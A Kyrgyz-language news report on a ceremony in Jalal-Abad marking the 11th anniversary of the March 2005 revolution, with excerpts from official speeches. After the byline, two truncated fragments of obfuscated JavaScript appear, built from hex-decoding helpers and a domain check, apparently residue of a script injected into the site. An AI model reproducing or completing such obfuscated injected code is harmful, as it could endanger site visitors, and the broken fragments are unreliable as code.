Menu

Жалал-Абаддагы борбордук Эркиндик аянтында 24-март ыңкылабынын 11 жылдыгы белгиленди

Бөлүшүү:

Бүгүн, 24-мартта Жалал-Абад шаарындагы борбордук Эркиндик аянтында март ыңкылабынын 11 жылдыгы салтанаттуу белгиленди деп маалымдады өкүлдүн басма сөз катчысы. Салтанаттуу иш чарага март ыңкылабынын катышуучулары, Жалал-Абад шаарынын тургундары, шаардык жана областтык мекеме-уюмдардын жетекчилери менен коомдук уюмдардын өкүлдөрү катышты.

24-март – элдик ыңкылабдын 11 жылдыгына арналган салтанаттуу иш чара Кыргыз Республикасынын мамлекеттик гимни менен башталды. Шаардын жаштары тарабынан ошол мезгилди чагылдырган чакан театралдаштырылган оюн-зоок тартууланды.

Эгемендүү Кыргызстандын тарыхында 2005-жылдын 24-мартындагы ыңкылап өлкөбүздүн тарыхында эркиндикке жана адилеттүүлүкө умтулуусунун ачык-айкын мисалы болуп кала берери талашсыз.  Мындан он бир жыл илгери дүйнөгө «Жоогазын революциясы» деген ат менен белгилүү болгон ошол март ыңкылабынын негизги башаты Жалал-Абад менен Ош аймактарынан башталып, кийинчерээк бүтүндөй өлкөдөгү нараазылыктарды борборго топтогон эле. Карапайым эл  ар кандай кыйынчылыктар менен сыноолорго чыдап келген. Бирок, кыргыз эли тээ байыртадан эле бийликтин адилетсиз саясатына чыдаган эмес. Муну 2005-жылдын 24-мартындагы ыңкылабы толук далилдеп тастыктады десек аша чапкандыкка жатпайт. Бүткүл өлкөнү бир адамдын башкарып калуусу, бийликтин башкы өзөгү болгон эл менен эсептешпей калуунун аягы ушундай аянычтуу тагдыр менен аяктаарын мамлекеттин биринчи президенти Аскар Акаевдин өз мекенинен – Кыргызстандан  качып кетүүсү менен аяктады.

Ошол кездеги президент Аскар Акаевдин жүргүзгөн авторитардык саясаты, өз балдарын ачык эле парламентке алып келүү аракети, элдин жашоо-турмушунун начарлап кетүүсү, социалдык-экономикалык оор кырдаал элди көчөлөргө митингке чыгарып, чындык менен адилеттүүлүктү издөөгө алып келди.

Кыргыз Республикасынын Президенти Алмазбек Атамбаев өзүнүн кайрылуусунда 24-март окуясындагы үмүттөр акталбай калгандыгына басым жасаган. «Карапайым элдин жеңиши уурдалды. Бир жексур режим экинчиси менен алмашылып гана калды. Эгерде элдин кызыкчылыгына чыккынчылык жасалбаганда Кыргызстан ошондо эле бутуна бекем туруп, жарандарына татыктуу жашоону камсыздоого жетишмек. 2010-жылдын апрелиндеги жоготуулар, июнундагы трагедия болмок эмес»,- деп айтылган Президенттин билдирүүсүндө.

Март ыңкылабынан кийин элдин жакшы жашоого болгон үмүт-тилектери чоң болгон эле. Бирок, ал жакшы үмүт тилектер, асыл ой-максаттар чындыгында акталбай калды. Элдин түздөн-түз колдоосу менен келген бийлик,  мурдагы бийлик басып алган «эски грабилди» кайрадан дагы басып алды. Бир катар жакшы реформалар башталганы менен эски бийликтен калган үй-бүлөлүк башкаруу, сөз эркиндигин басмырлоо сыяктуу жагымсыз көрүнүштөрдү «мурастап» калгандыгы ачык билине баштады. Элдин кескин кыжырдануусун жараткан нерсе электр энергиясына болгон баалардын кескин көтөрүлүүсү болду, Башкы мыйзам болгон Конститутцияны каалагандай бузуп, оңдоп, өз бийлигин бекемдөөгө болгон далаалаты элдин чыдамын кетирди. Бул акыры барып апрель ыңкылабына алып келди.

Кыргыз эли тээ байыртадан эле досторуна эч нерсесин аябаган айкөл эл катары тарыхта даңкталып келген. Ошону менен бирге кыргыз эли мамлекеттин бүтүндүгүнө шек келтирген оор кыйынчылыктар жаралганда бир муштумдай түйүлгөн ынтымактуу жана эр жүрөк эл болгондугу дагы тарыхта жакшы белгилүү. Эгемендүүлүккө ээ болгон Кыргыз мамлекетинин жаңы тарыхында  кыргыз эли эки ыңкылапты жана коогалаңдуу июнь окуяларын өз башынан кечирди. Албетте, бул өз кезегинде дүйнөлүк коомчулукка терс таасирин дагы тийгизди. Кайсыл жерде саясий коомдук турмуштун стабилдүүлүгү жана тынчтык болсо, элдин ынтымагы менен ырашкерлиги болсо ошол жерде өнүгүп өсүү жана кайра жаратмандык болот. Кудайга шүгүр, азыр өлкөбүздө саясий стабилдүүлүк бекем орноп, көп улуттуу элдерибиздин бекем достугу менен ынтымагы жаралды. Бул биздин эң башкы байлыгыбыз десем жаңылбаймын.

Сөзүмдүн аягында баарыңыздарга бекем ден соолук, үй-бүлөлүк бакыт-таалай жана ынтымак менен ырашкерлик каалаймын. Ар дайым асманыбыз ачык болсун. Эгемендүү Кыргыз мамлекети алга карай ишенимдүү өнүгө берсин. Дагы бир ирет  24 март ыңкылабынын 11 жылдыгы менен баарыңыздарды чын дилимден куттуктаймын!,- деди өкүлдүн орун басары Бактыбек Анаркулов.

2005-жылдагы 24-март – элдик ыңкылабынын 11 жылдыгына арналган салтанаттуу иш чаранын жүрүүсүндө анын катышуучуларын  Жалал-Абад шаарынын мэри Салайдин Авазов, Жалал-Абад шаардык ардагерлер кеңешинин төрагасы Аламан Адиев, март ыңкылабынын катышуучулары Карыбек Омүрбеков менен  Айчүрөк Мамажанова куттукташты. Андан соң кайрадан Кыргыз Республикасынын гимни ойнолуп, андан соң Эркиндик монументине жетекчилер менен март ыңкылабынын катышуучулары жана коомчулуктун өкүлдөрү гүлчамбарларды коюшту.

 

Жолдошбай Осмонов, журналист

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 39 − = 29

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: